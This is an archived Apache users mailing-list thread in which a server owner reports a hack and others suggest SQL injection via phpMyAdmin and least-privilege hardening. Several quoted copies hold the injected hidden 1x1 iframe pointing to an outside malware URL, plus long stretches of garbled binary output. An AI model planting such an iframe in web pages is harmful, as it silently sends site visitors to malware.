You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@httpd.apache.org by Oleg Goryunov <ol...@gmail.com> on 2010/04/03 23:03:06 UTC
[users@httpd] Someone hacked my apache2 server
Hello all,
It looks like someone hacked my apache2 server and I am trying to understand
how this could have happened.
This is what happened:
All of a sudden the server - in response to a web-browser request for a page
- started to give a full screen of unknown characters (looked like a long
text with encoding mismatch).
The output was immediate and the same for all the web-sites located on the
server.
Looking at the page source of the output I see the following:
=========
<iframe src= http://azsxde55.9966.org:8800/ak47/29.html width=1
height=1></iframe> Л ������ э[сn█8 ■▌�√ \-░{ ╘Ц '█&q ┤I
щ]╙ф╥l{√ла$┌fCС*I┘ёс цЮхЮьf(╩Ц 9N▓-о╗pА─ 9№f8Ь З╩Ё√Уєул▀.^СЙM
╣°їхЫ╫╟$шДсЗ┴q Ю\ЭР Ю^Э╜!¤nП\i*
╖\I*┬Ё╒█А k│¤0Ь═f▌┘алЇ8╝║ o лПГ¤╫ОнМь&6 ОЖО▀M*д9lAщяээ ГГгн√╙"╤╛аr|
0┘ G й= г╔╤ !├И F&ЪН РТ═║TP═НаСщ╞*
MЮeJ█n ║Б)│ФрР √Ьєщa +iЩ┤ ;╧X@№╙a`┘Н
qр Й'T f s;ъ<псHЪ▓├@лHYS ╦e┬nЮТС B═Z \│∙Lщд:фУRйаO╔▀▄g╦ ╦ни╩ўю╫ЛЛє╦л
JЪ█Й╥ ╥ I╩%7░К █o
HШЙ5╧p}+г
I╛' b'М$sах1A}RAШ s╔ ХI9АдT╥1KёлЩ ╦╥ Nc&ЩЧт Я~w xЭgLТw*╫1#╟ ∙lБ\B:e y
├т ; Ч╫▐,B ! ╘2 .═" ╤) ╓]° ═─a`@Y6╬-┴ЎАа └
ж└1╝щ m ╙BIЮ└Щ╟':еEk@МОБg╩ N├b■с' жJYеДщ~2р4aA№h┤Ш║EjАm │.&cчВЩ cАqЧ
bSyь┬SPХ─=├д R├ пD▌ ЖЕ o
#Х╠Б═╔ыў$ ╘@|H)ЧA╜)7LЯ1Щг9@/╙╨ d8R:%4F}А,L6Ь МnвТ├ S $.мO(0┌Аph╞╤
\Є╤l№ 4#·У'C.3┤ аMU"╞Є#КБ8╒9Х╚╦>ПхFGъ& T╪j┐с ·~
FZ∙d�0KJ.ю bE╔йь╜┼g ь8.╟нтг┴г╥ ┤щ9MxТ0YЄYЎ▐т4е" К93Ю╫ез%gмdЗ ii(░8
Н3%┴ГCTE кЖx─t╫o H щ█Ж!- Ф^ A┘#А╕ tI9kЗ▒UN║m~╩З;? Аv \╚
╟8K═їbФ7а5C4│╣^▓z3x█ПO_Nc∙ПЬЮ^┌шd╧№ЎaW^|xЯп┼ВяI2`╜╜┴nowў┘(┌┘▐щя$╔^ э
╢√╔ВK бЖ!┌╣є8Ёз║WYХбS ┼Ё█я ▀pеqз ЄtьГPлЫє0ъО∙ha :"V сг╞i ╖Z@
Yў■ЕY,Р`- FE4Юa. ё Жv0и Ї ^ЎdTуц┬A╬>t╨╡┘ ЩМ╩г╙є│W }ё+▓ fUXЗўs -wвR
F░∙Н╕5▐d ░Ч╛▒
~ ёY вТ аY tlkачоЭ`√-▄ ┼mсЁ╠ .█ ╣н┌Г■{ х?ъ
uю4d═┤JЄ╕.т╒щ+rqy~Єыё╒▌║▄m ╣Ь* 35ez╩a▒крпх{ь#eч:х>_┴Гъx 1°/л1xQщ╕
╝вУжEФ,".`н╞г\║нмa E'YЇоЫ╚▐
.Zх А:эl.Л▐{│┘юн`уRЭ ─Ь °K╩t╠йш$hH │╖║ -д╚Ъ,i╔ТvЭ ¤╡"H пч¤Ў№°
L╖W0Нsc┴ u R%ъ4╪Yf├5╬╟ЮТ,(+yє:ЎГ ь%│░щ]wR%1ё┬Е.r╞ ы╖ YR∙<} █ ю О╕д╥-q
╖_╩╬{2Yхц╕╔ ┴┤щрБA+Q╖▄▓Ч°▐{З╗чП
wШA┼╣╓ю4Rўs╠Fз╠╣{╙ k╔йч░8╛▄ ■╢ЫБ├#ЕнБя№~ o╗╣ЫФа &28
^╫@O}у:╨f -AпеЪ ЦМ Ю┘k╚ пЎ▄{щ·╜/╖UїЫq$aйк╔xЄъь|═ 5 1▄ И Яєцц| ─w▄oя
4унc�╟?╞dLM#гx╖l┐┐J╖┐аJЫa
╙v*чї8x~vётэow+v╨\ П ╥dJ! │·╠_,Ъ╫Шъа ╚KрФ Г ь*ъY╤╢
r┼м1С4Н8<╗kaЁ█CЄїЧП═╫гGцы╤▌∙·"O Ч╤ │ї R_√YР.& | ПжtXОH°┤╤¤ЖНАD▄┘Й ю╕r
¤
KV$Ч ╙ШлWН'8z▒Р█ Жk╛YEx├хupDBRгИ4гIмє42p$╢У ЭГ ї¤f╦ > Ж ?> ы'ci
в╫i�ЙйМaщ ~ЖV ТMЁ0╩╟╥┘ **єA╞ У░ #mgDS.ц√ vо 2бзX"Ь╥ГаN +бЇ>∙бч~ И;ўL
Oь>Сp╚етА8<мГьУ■ ╗ Мяnё|<╨д_У█w?╧ь:Y ∙l-Л иSF╡Ш fa,VWэДZWА¤ЬГ.эЬ°]Х
▄щсМ├
би╝9сй+╬B A& ╔-ЧnдUX▒uu вF В )Odф
с b6Щ ХkByКПV!╔Ф'╠!D░UСLA ─Х/%Аїч(d╠║Лx6щ;ЭЧкHй s╣OznЖ├HУЁш ╪┤L
SАД( │БD.GF <http://d.gf/>Ц╟╫мм&╗Z3NvJ╣p шh╖w┬] ╦
С▌┴№┐ iяяАm 4─7шbеzq║hКФЕ┤╜N&└-
*X;TуМСDэ{.╣X╟жКY╓р nbgl╦═E│$S У═Зр q K#К3Fб:╚·1 З ёqо]П█rА n:▀А╨
Ы╔Е;Лz╦0╕╩5С╤Д╤R╜ Ыr
┐Яyy4│ ┬>╚ЁН)╟{ЕЩ(х4╘╨ х ■ У |ЇY8°y╖zЇ─@$D s№▒йb▒ж1Гпс│╦АPq_∙Ун8q ╒j
╒╢B║ ╡ь< ╪э*ЫГБe ЕkT|└э -Ў�┴Z ╝╫╠▄= 4═Q├╛@Ё╘ └Ю"ЛН┼LxЦA╪е╞н цмВY
ёJф╢ЪЇ╓ ▒╥с╛°мщЄц╥╗>nG~CH(d"╒ГcЛР夹a ▓▐ 69╖ АoX;wц ыlэ╡s YИLШ@
╗ √C Zь р"°ЄБPcЧa)gУeхд4NH┐ /═!cСДеР┤ й╔гФCъ .9+єЫ┐╪ ф5X р
6<ч▒┼�Ъ$╨т╥▒ИСЄ╥ №u╞aМtЄХ^ЁW?Kў╖2 ймУр╓4Р E
==================
The address indicated in the begining of the page code leads to some chinese
server.
So, somehow it happened that the output of the apache server was substituted
by this page, which redirected visitors to some chinese server.
But the most strange thing was that the problem dissapeared itself! So, it
last for 10 minutes then disappeared! And the again started and again
dissapeared. Finally, I turned down apache untill I understand what is going
on...
Any idea how could that happen? How to reproduce this? How to prevent?
Where to look for logs? I have check both ssh logs and apache logs, there is
nothing that could seem unusual there...
Any help is appreciated.
Oleg.
Re: [users@httpd] Someone hacked my apache2 server
Posted by Oleg Goryunov <ol...@gmail.com>.
Dan,
Thanks for the advice! I will note that.
Oleg.
2010/4/5 <Da...@ymp.gov>
>
> Oleg,
>
> Some other things to check/do if you don't already know this...
>
> Be sure that the httpd process runs as a completely unprivileged user with
> nothing but read access to ANYTHING.
> Be sure that the content of your site is not owned by the same user as the
> httpd user. Read only access should be through group, other or acl.
> Be sure that the apache config files, libraries, binaries, etc. are owned
> by as different user then the httpd process user. Read and Execute access
> should be through group, other or acl.
>
> Same goes for MySQL and any other processes running on the machines. The
> running processes should NOT have write access to their own config files.
>
> Try to think about the problem form the running processes perspective, if I
> was the httpd/mysql/etc. process, what can I hurt? Get that to a minimum.
>
> If there is a buffer overflow problem somewhere, you might not be able to
> prevent the in memory running process from being hacked, but as long as they
> can't hack the files on the server(s), a quick stop/start or reboot should
> fix the problem.
>
> Good Luck!
>
> Dan
>
>
> Please respond to users@httpd.apache.org
>
> To: users@httpd.apache.org
> cc: (bcc: Dan Mitton/YD/RWDOE)
> Subject: Re: [users@httpd] Someone hacked my apache2 server
>
> LSN: Not Relevant
> User Filed as: Not a Record
>
> Oh, ok. I got it. I have already disabled it (actually, immediately after
> the attack).
> Thanks for the advice. I appreciate!
> Oleg.
>
> On Sun, Apr 4, 2010 at 5:52 PM, Daniel Reinhardt <*cryptodan@cryptodan.net
> * <cr...@cryptodan.net>> wrote:
>
> --------------------------------------------------
> From: "Oleg Goryunov" <*oleg.goryunov@gmail.com* <ol...@gmail.com>
> >
> Sent: 04 April, 2010 13:39
>
> To: <*users@httpd.apache.org* <us...@httpd.apache.org>>
> Subject: Re: [users@httpd] Someone hacked my apache2 server
>
>
> Yes, there is a MySQL server. And actually, I noticed that - while the
> server was returning the mentioned hacked page, mysql process was on top of
> the list of the "top" command. Though, it took only 1.5% of the CPU.
> But, mysql is restricted to accept connections from outside world. It only
> listens on local socket.
> What kind of vulnarability does mysql have? Do you know where I can read
> about it?
> Oleg.
>
> On Sun, Apr 4, 2010 at 4:55 PM, Daniel Reinhardt <*cryptodan@cryptodan.net
> * <cr...@cryptodan.net>>wrote:
>
>
> --------------------------------------------------
> From: "Oleg Goryunov" <*oleg.goryunov@gmail.com* <ol...@gmail.com>
> >
> Sent: 03 April, 2010 21:03
> To: <*users@httpd.apache.org* <us...@httpd.apache.org>>
> Subject: [users@httpd] Someone hacked my apache2 server
>
> Hello all,
> It looks like someone hacked my apache2 server and I am trying to
> understand
> how this could have happened.
> This is what happened:
> All of a sudden the server - in response to a web-browser request for a
> page
> - started to give a full screen of unknown characters (looked like a long
> text with encoding mismatch).
> The output was immediate and the same for all the web-sites located on the
> server.
> Looking at the page source of the output I see the following:
> =========
>
> <iframe src= *http://azsxde55.9966.org:8800/ak47/29.html*<http://azsxde55.9966.org:8800/ak47/29.html>width=1
> height=1></iframe> Л ������ э[сn█8 ■▌�√ \-░{ ╘Ц '█&q ┤I
> щ]╙ф╥l{√ла$┌fCС*I┘ёс цЮхЮьf(╩Ц 9N▓-о╗pА─ 9№f8Ь З╩Ё√Уєул▀.^СЙM
> ╣°їхЫ╫╟$шДсЗ┴q Ю\ЭР Ю^Э╜!¤nП\i*
>
> ╖\I*┬Ё╒█А k│¤0Ь═f▌┘алЇ8╝║ o лПГ¤╫ОнМь&6 ОЖО▀M*д9lAщяээ ГГгн√╙"╤╛аr|
> 0┘ G й= г╔╤ !├И F&ЪН РТ═║TP═НаСщ╞*
> MЮeJ█n ║Б)│ФрР √Ьєщa +iЩ┤ ;╧X@№╙a`┘Н
> qр Й'T f s;ъ<псHЪ▓├@лHYS ╦e┬nЮТС B═Z \│∙Lщд:фУRйаO╔▀▄g╦ ╦ни╩ўю╫ЛЛє╦л
> JЪ█Й╥ ╥ I╩%7░К █o
>
> HШЙ5╧p}+г
> I╛' b'М$sах1A}RAШ s╔ ХI9АдT╥1KёлЩ ╦╥ Nc&ЩЧт Я~w xЭgLТw*╫1#╟ ∙lБ\B:e y
> ├т ; Ч╫▐,B ! ╘2 .═" ╤) ╓]° ═─a`@Y6╬-┴ЎАа └
> ж└1╝щ m ╙BIЮ└Щ╟':еEk@МОБg╩ N├b■с' жJYеДщ~2р4aA№h┤Ш║EjАm │.&cчВЩ cАqЧ
> bSyь┬SPХ─=├д R├ пD▌ ЖЕ o
>
> #Х╠Б═╔ыў$ ╘@|H)ЧA╜)7LЯ1Щг9@/╙╨ d8R:%4F}А,L6Ь МnвТ├ S $.мO(0┌Аph╞╤
> \Є╤l№ 4#·У'C.3┤ аMU"╞Є#КБ8╒9Х╚╦>ПхFGъ& T╪j┐с ·~
> FZ∙d�0KJ.ю bE╔йь╜┼g ь8.╟нтг┴г╥ ┤щ9MxТ0YЄYЎ▐т4е" К93Ю╫ез%gмdЗ ii(░8
> Н3%┴ГCTE кЖx─t╫o H щ█Ж!- Ф^ A┘#А╕ tI9kЗ▒UN║m~╩З;? Аv \╚
> ╟8K═їbФ7а5C4│╣^▓z3x█ПO_Nc∙ПЬЮ^┌шd╧№ЎaW^|xЯп┼ВяI2`╜╜┴nowў┘(┌┘▐щя$╔^ э
> ╢√╔ВK бЖ!┌╣є8Ёз║WYХбS ┼Ё█я ▀pеqз ЄtьГPлЫє0ъО∙ha :"V сг╞i ╖Z@
> Yў■ЕY,Р`- FE4Юa. ё Жv0и Ї ^ЎdTуц┬A╬>t╨╡┘ ЩМ╩г╙є│W }ё+▓ fUXЗўs -wвR
> F░∙Н╕5▐d ░Ч╛▒
>
>
> ~ ёY вТ аY tlkачоЭ`√-▄ ┼mсЁ╠ .█ ╣н┌Г■{ х?ъ
> uю4d═┤JЄ╕.т╒щ+rqy~Єыё╒▌║▄m ╣Ь* 35ez╩a▒крпх{ь#eч:х>_┴Гъx 1°/л1xQщ╕
> ╝вУжEФ,".`н╞г\║нмa E'YЇоЫ╚▐
> .Zх А:эl.Л▐{│┘юн`уRЭ ─Ь °K╩t╠йш$hH │╖║ -д╚Ъ,i╔ТvЭ ¤╡"H пч¤Ў№°
> L╖W0Нsc┴ u R%ъ4╪Yf├5╬╟ЮТ,(+yє:ЎГ ь%│░щ]wR%1ё┬Е.r╞ ы╖ YR∙<} █ ю О╕д╥-q
> ╖_╩╬{2Yхц╕╔ ┴┤щрБA+Q╖▄▓Ч°▐{З╗чП
>
> wШA┼╣╓ю4Rўs╠Fз╠╣{╙ k╔йч░8╛▄ ■╢ЫБ├#ЕнБя№~ o╗╣ЫФа &28
> ^╫@O}у:╨f -AпеЪ ЦМ Ю┘k╚ пЎ▄{щ·╜/╖UїЫq$aйк╔xЄъь|═ 5 1▄ И Яєцц| ─w▄oя
> 4унc�╟?╞dLM#гx╖l┐┐J╖┐аJЫa
> ╙v*чї8x~vётэow+v╨\ П ╥dJ! │·╠_,Ъ╫Шъа ╚KрФ Г ь*ъY╤╢
> r┼м1С4Н8<╗kaЁ█CЄїЧП═╫гGцы╤▌∙·"O Ч╤ │ї R_√YР.& | ПжtXОH°┤╤¤ЖНАD▄┘Й ю╕r
> ¤
>
> KV$Ч ╙ШлWН'8z▒Р█ Жk╛YEx├хupDBRгИ4гIмє42p$╢У ЭГ ї¤f╦ > Ж ?> ы'ci
> в╫i�ЙйМaщ ~ЖV ТMЁ0╩╟╥┘ **єA╞ У░ #mgDS.ц√ vо 2бзX"Ь╥ГаN +бЇ>∙бч~ И;ўL
> Oь>Сp╚етА8<мГьУ■ ╗ Мяnё|<╨д_У█w?╧ь:Y ∙l-Л иSF╡Ш fa,VWэДZWА¤ЬГ.эЬ°]Х
> ▄щсМ├
>
> би╝9сй+╬B A& ╔-ЧnдUX▒uu вF В )Odф
> с b6Щ ХkByКПV!╔Ф'╠!D░UСLA ─Х/%Аїч(d╠║Лx6щ;ЭЧкHй s╣OznЖ├HУЁш ╪┤L
> SАД( │Б*D.GF* <http://d.gf/> <*http://d.gf/* <http://d.gf/>>Ц╟╫мм&╗Z3NvJ╣p
> шh╖w┬] ╦
>
> С▌┴№┐ iяяАm 4─7шbеzq║hКФЕ┤╜N&└-
>
> *X;TуМСDэ{.╣X╟жКY╓р nbgl╦═E│$S У═Зр q K#К3Fб:╚·1 З ёqо]П█rА n:▀А╨
> Ы╔Е;Лz╦0╕╩5С╤Д╤R╜ Ыr
>
> ┐Яyy4│ ┬>╚ЁН)╟{ЕЩ(х4╘╨ х ■ У |ЇY8°y╖zЇ─@$D s№▒йb▒ж1Гпс│╦АPq_∙Ун8q ╒j
> ╒╢B║ ╡ь< ╪э*ЫГБe ЕkT|└э -Ў�┴Z ╝╫╠▄= 4═Q├╛@Ё╘ └Ю"ЛН┼LxЦA╪е╞н цмВY
> ёJф╢ЪЇ╓ ▒╥с╛°мщЄц╥╗>nG~CH(d"╒ГcЛР夹a ▓▐ 69╖ АoX;wц ыlэ╡s YИLШ@
> ╗ √C Zь р"°ЄБPcЧa)gУeхд4NH┐ /═!cСДеР┤ й╔гФCъ .9+єЫ┐╪ ф5X р
> 6<ч▒┼�Ъ$╨т╥▒ИСЄ╥ №u╞aМtЄХ^ЁW?Kў╖2 ймУр╓4Р E
>
> ==================
> The address indicated in the begining of the page code leads to some
> chinese
> server.
> So, somehow it happened that the output of the apache server was
> substituted
> by this page, which redirected visitors to some chinese server.
>
> But the most strange thing was that the problem dissapeared itself! So, it
> last for 10 minutes then disappeared! And the again started and again
> dissapeared. Finally, I turned down apache untill I understand what is
> going
> on...
>
> Any idea how could that happen? How to reproduce this? How to prevent?
> Where to look for logs? I have check both ssh logs and apache logs, there
> is
> nothing that could seem unusual there...
>
> Any help is appreciated.
> Oleg.
>
>
> Oleg,
>
> Are you running any sort of MySQL Database on this machine, and if so is it
> patched and fully updated along with any php scripts. What you are showing
> us is indicative of a SQL Injection Attack.
>
> Shocked no one has mentioned especially with the rampant incline of the
> Russian Business Network to spread its malware through the use of SQL
> Injection on any vulnerable website.
>
> Thanks,
> Daniel
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:*http://httpd.apache.org/userslist.html*<http://httpd.apache.org/userslist.html>>
> for more info.
> To unsubscribe, e-mail: *users-unsubscribe@httpd.apache.org*<us...@httpd.apache.org>
> " from the digest: *users-digest-unsubscribe@httpd.apache.org*<us...@httpd.apache.org>
> For additional commands, e-mail: *users-help@httpd.apache.org*<us...@httpd.apache.org>
>
>
>
>
> Oleg,
>
> Its not a vulnerability with MySQL it is a vulnerable PHP Script such as an
> outdated PHPMyAdmin or PHPMyAdmin itself. I hardly run it on my servers. I
> would promptly disable it.
>
>
> Thanks,
> Daniel
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:*http://httpd.apache.org/userslist.html*<http://httpd.apache.org/userslist.html>>
> for more info.
> To unsubscribe, e-mail: *users-unsubscribe@httpd.apache.org*<us...@httpd.apache.org>
> " from the digest: *users-digest-unsubscribe@httpd.apache.org*<us...@httpd.apache.org>
> For additional commands, e-mail: *users-help@httpd.apache.org*<us...@httpd.apache.org>
>
>
>
>
Re: [users@httpd] Someone hacked my apache2 server
Posted by Da...@YMP.GOV.
Oleg,
Some other things to check/do if you don't already know this...
Be sure that the httpd process runs as a completely unprivileged user with
nothing but read access to ANYTHING.
Be sure that the content of your site is not owned by the same user as the
httpd user. Read only access should be through group, other or acl.
Be sure that the apache config files, libraries, binaries, etc. are owned
by as different user then the httpd process user. Read and Execute access
should be through group, other or acl.
Same goes for MySQL and any other processes running on the machines. The
running processes should NOT have write access to their own config files.
Try to think about the problem form the running processes perspective, if
I was the httpd/mysql/etc. process, what can I hurt? Get that to a
minimum.
If there is a buffer overflow problem somewhere, you might not be able to
prevent the in memory running process from being hacked, but as long as
they can't hack the files on the server(s), a quick stop/start or reboot
should fix the problem.
Good Luck!
Dan
Please respond to users@httpd.apache.org
To: users@httpd.apache.org
cc: (bcc: Dan Mitton/YD/RWDOE)
Subject: Re: [users@httpd] Someone hacked my apache2 server
LSN: Not Relevant
User Filed as: Not a Record
Oh, ok. I got it. I have already disabled it (actually, immediately after
the attack).
Thanks for the advice. I appreciate!
Oleg.
On Sun, Apr 4, 2010 at 5:52 PM, Daniel Reinhardt <cr...@cryptodan.net>
wrote:
--------------------------------------------------
From: "Oleg Goryunov" <ol...@gmail.com>
Sent: 04 April, 2010 13:39
To: <us...@httpd.apache.org>
Subject: Re: [users@httpd] Someone hacked my apache2 server
Yes, there is a MySQL server. And actually, I noticed that - while the
server was returning the mentioned hacked page, mysql process was on top
of
the list of the "top" command. Though, it took only 1.5% of the CPU.
But, mysql is restricted to accept connections from outside world. It only
listens on local socket.
What kind of vulnarability does mysql have? Do you know where I can read
about it?
Oleg.
On Sun, Apr 4, 2010 at 4:55 PM, Daniel Reinhardt <cryptodan@cryptodan.net
>wrote:
--------------------------------------------------
From: "Oleg Goryunov" <ol...@gmail.com>
Sent: 03 April, 2010 21:03
To: <us...@httpd.apache.org>
Subject: [users@httpd] Someone hacked my apache2 server
Hello all,
It looks like someone hacked my apache2 server and I am trying to
understand
how this could have happened.
This is what happened:
All of a sudden the server - in response to a web-browser request for a
page
- started to give a full screen of unknown characters (looked like a long
text with encoding mismatch).
The output was immediate and the same for all the web-sites located on the
server.
Looking at the page source of the output I see the following:
=========
<iframe src= http://azsxde55.9966.org:8800/ak47/29.html width=1
height=1></iframe> Л ?????? э[сn█8 ■▌?√ \-░{ ╘Ц '█&q ┤I
щ]╙ф╥l{√ла$┌fCС*I┘ёс цЮхЮьf(╩Ц 9N▓-о╗pА─ 9?f8Ь З╩Ё√У?ул▀.^СЙM
╣°?хЫ╫╟$шДсЗ┴q Ю\ЭР Ю^Э╜!?nП\i*
╖\I*┬Ё╒█А k│?0Ь═f▌┘ал?8╝║ o лПГ?╫ОнМь&6 ОЖО▀M*д9lAщяээ ГГгн√╙"╤╛аr|
0┘ G й= г╔╤ !├И F&ЪН РТ═║TP═НаСщ╞*
MЮeJ█n ║Б)│ФрР √Ь?щa +iЩ┤ ;╧X@?╙a`┘Н
qр Й'T f s;ъ<псHЪ▓├@лHYS ╦e┬nЮТС B═Z \│∙Lщд:фУRйаO╔▀▄g╦ ╦ни╩?ю╫ЛЛ?╦л
JЪ█Й╥ ╥ I╩%7░К █o
HШЙ5╧p}+г
I╛' b'М$sах1A}RAШ s╔ ХI9АдT╥1KёлЩ ╦╥ Nc&ЩЧт Я~w xЭgLТw*╫1#╟ ∙lБ\B:e y
├т ; Ч╫▐,B ! ╘2 .═" ╤) ╓]° ═─a`@Y6╬-┴?Аа └
ж└1╝щ m ╙BIЮ└Щ╟':еEk@МОБg╩ N├b■с' жJYеДщ~2р4aA?h┤Ш║EjАm │.&cчВЩ cАqЧ
bSyь┬SPХ─=├д R├ пD▌ ЖЕ o
#Х╠Б═╔ы?$ ╘@|H)ЧA╜)7LЯ1Щг9@/╙╨ d8R:%4F}А,L6Ь МnвТ├ S $.мO(0┌Аph╞╤
\?╤l? 4#·У'C.3┤ аMU"╞?#КБ8╒9Х╚╦>ПхFGъ& T╪j┐с ·~
FZ∙d?0KJ.ю bE╔йь╜┼g ь8.╟нтг┴г╥ ┤щ9MxТ0Y?Y?▐т4е" К93Ю╫ез%gмdЗ ii(░8
Н3%┴ГCTE кЖx─t╫o H щ█Ж!- Ф^ A┘#А╕ tI9kЗ▒UN║m~╩З;? Аv \╚
╟8K═?bФ7а5C4│╣^▓z3x█ПO_Nc∙ПЬЮ^┌шd╧??aW^|xЯп┼ВяI2`╜╜┴now?┘(┌┘▐щя$╔^ э
╢√╔ВK бЖ!┌╣?8Ёз║WYХбS ┼Ё█я ▀pеqз ?tьГPлЫ?0ъО∙ha :"V сг╞i ╖Z@
Y?■ЕY,Р`- FE4Юa. ё Жv0и ? ^?dTуц┬A╬>t╨╡┘ ЩМ╩г╙?│W }ё+▓ fUXЗ?s -wвR
F░∙Н╕5▐d ░Ч╛▒
~ ёY вТ аY tlkачоЭ`√-▄ ┼mсЁ╠ .█ ╣н┌Г■{ х?ъ
uю4d═┤J?╕.т╒щ+rqy~?ыё╒▌║▄m ╣Ь* 35ez╩a▒крпх{ь#eч:х>_┴Гъx 1°/л1xQщ╕
╝вУжEФ,".`н╞г\║нмa E'Y?оЫ╚▐
.Zх А:эl.Л▐{│┘юн`уRЭ ─Ь °K╩t╠йш$hH │╖║ -д╚Ъ,i╔ТvЭ ?╡"H пч???°
L╖W0Нsc┴ u R%ъ4╪Yf├5╬╟ЮТ,(+y?:?Г ь%│░щ]wR%1ё┬Е.r╞ ы╖ YR∙<} █ ю О╕д╥-q
╖_╩╬{2Yхц╕╔ ┴┤щрБA+Q╖▄▓Ч°▐{З╗чП
wШA┼╣╓ю4R?s╠Fз╠╣{╙ k╔йч░8╛▄ ■╢ЫБ├#ЕнБя?~ o╗╣ЫФа &28
^╫@O}у:╨f -AпеЪ ЦМ Ю┘k╚ п?▄{щ·╜/╖U?Ыq$aйк╔x?ъь|═ 5 1▄ И Я?цц| ─w▄oя
4унc?╟?╞dLM#гx╖l┐┐J╖┐аJЫa
╙v*ч?8x~vётэow+v╨\ П ╥dJ! │·╠_,Ъ╫Шъа ╚KрФ Г ь*ъY╤╢
r┼м1С4Н8<╗kaЁ█C??ЧП═╫гGцы╤▌∙·"O Ч╤ │? R_√YР.& | ПжtXОH°┤╤?ЖНАD▄┘Й ю╕r
?
KV$Ч ╙ШлWН'8z▒Р█ Жk╛YEx├хupDBRгИ4гIм?42p$╢У ЭГ ??f╦ > Ж ?> ы'ci
в╫i?ЙйМaщ ~ЖV ТMЁ0╩╟╥┘ **?A╞ У░ #mgDS.ц√ vо 2бзX"Ь╥ГаN +б?>∙бч~ И;?L
Oь>Сp╚етА8<мГьУ■ ╗ Мяnё|<╨д_У█w?╧ь:Y ∙l-Л иSF╡Ш fa,VWэДZWА?ЬГ.эЬ°]Х
▄щсМ├
би╝9сй+╬B A& ╔-ЧnдUX▒uu вF В )Odф
с b6Щ ХkByКПV!╔Ф'╠!D░UСLA ─Х/%А?ч(d╠║Лx6щ;ЭЧкHй s╣OznЖ├HУЁш ╪┤L
SАД( │БD.GF <http://d.gf/>Ц╟╫мм&╗Z3NvJ╣p шh╖w┬] ╦
С▌┴?┐ iяяАm 4─7шbеzq║hКФЕ┤╜N&└-
*X;TуМСDэ{.╣X╟жКY╓р nbgl╦═E│$S У═Зр q K#К3Fб:╚·1 З ёqо]П█rА n:▀А╨
Ы╔Е;Лz╦0╕╩5С╤Д╤R╜ Ыr
┐Яyy4│ ┬>╚ЁН)╟{ЕЩ(х4╘╨ х ■ У |?Y8°y╖z?─@$D s?▒йb▒ж1Гпс│╦АPq_∙Ун8q ╒j
╒╢B║ ╡ь< ╪э*ЫГБe ЕkT|└э -??┴Z ╝╫╠▄= 4═Q├╛@Ё╘ └Ю"ЛН┼LxЦA╪е╞н цмВY
ёJф╢Ъ?╓ ▒╥с╛°мщ?ц╥╗>nG~CH(d"╒ГcЛРе??a ▓▐ 69╖ АoX;wц ыlэ╡s YИLШ@
╗ √C Zь р"°?БPcЧa)gУeхд4NH┐ /═!cСДеР┤ й╔гФCъ .9+?Ы┐╪ ф5X р
6<ч▒┼?Ъ$╨т╥▒ИС?╥ ?u╞aМt?Х^ЁW?K?╖2 ймУр╓4Р E
==================
The address indicated in the begining of the page code leads to some
chinese
server.
So, somehow it happened that the output of the apache server was
substituted
by this page, which redirected visitors to some chinese server.
But the most strange thing was that the problem dissapeared itself! So, it
last for 10 minutes then disappeared! And the again started and again
dissapeared. Finally, I turned down apache untill I understand what is
going
on...
Any idea how could that happen? How to reproduce this? How to prevent?
Where to look for logs? I have check both ssh logs and apache logs, there
is
nothing that could seem unusual there...
Any help is appreciated.
Oleg.
Oleg,
Are you running any sort of MySQL Database on this machine, and if so is
it
patched and fully updated along with any php scripts. What you are
showing
us is indicative of a SQL Injection Attack.
Shocked no one has mentioned especially with the rampant incline of the
Russian Business Network to spread its malware through the use of SQL
Injection on any vulnerable website.
Thanks,
Daniel
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Oleg,
Its not a vulnerability with MySQL it is a vulnerable PHP Script such as
an outdated PHPMyAdmin or PHPMyAdmin itself. I hardly run it on my
servers. I would promptly disable it.
Thanks,
Daniel
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Someone hacked my apache2 server
Posted by Oleg Goryunov <ol...@gmail.com>.
Oh, ok. I got it. I have already disabled it (actually, immediately after
the attack).
Thanks for the advice. I appreciate!
Oleg.
On Sun, Apr 4, 2010 at 5:52 PM, Daniel Reinhardt <cr...@cryptodan.net>wrote:
>
> --------------------------------------------------
> From: "Oleg Goryunov" <ol...@gmail.com>
> Sent: 04 April, 2010 13:39
>
> To: <us...@httpd.apache.org>
> Subject: Re: [users@httpd] Someone hacked my apache2 server
>
>
> Yes, there is a MySQL server. And actually, I noticed that - while the
>> server was returning the mentioned hacked page, mysql process was on top
>> of
>> the list of the "top" command. Though, it took only 1.5% of the CPU.
>> But, mysql is restricted to accept connections from outside world. It only
>> listens on local socket.
>> What kind of vulnarability does mysql have? Do you know where I can read
>> about it?
>> Oleg.
>>
>> On Sun, Apr 4, 2010 at 4:55 PM, Daniel Reinhardt <cryptodan@cryptodan.net
>> >wrote:
>>
>>
>>> --------------------------------------------------
>>> From: "Oleg Goryunov" <ol...@gmail.com>
>>> Sent: 03 April, 2010 21:03
>>> To: <us...@httpd.apache.org>
>>> Subject: [users@httpd] Someone hacked my apache2 server
>>>
>>> Hello all,
>>>
>>>> It looks like someone hacked my apache2 server and I am trying to
>>>> understand
>>>> how this could have happened.
>>>> This is what happened:
>>>> All of a sudden the server - in response to a web-browser request for a
>>>> page
>>>> - started to give a full screen of unknown characters (looked like a
>>>> long
>>>> text with encoding mismatch).
>>>> The output was immediate and the same for all the web-sites located on
>>>> the
>>>> server.
>>>> Looking at the page source of the output I see the following:
>>>> =========
>>>>
>>>> <iframe src= http://azsxde55.9966.org:8800/ak47/29.html width=1
>>>> height=1></iframe> Л ������ э[сn█8 ■▌�√ \-░{ ╘Ц '█&q ┤I
>>>> щ]╙ф╥l{√ла$┌fCС*I┘ёс цЮхЮьf(╩Ц 9N▓-о╗pА─ 9№f8Ь З╩Ё√Уєул▀.^СЙM
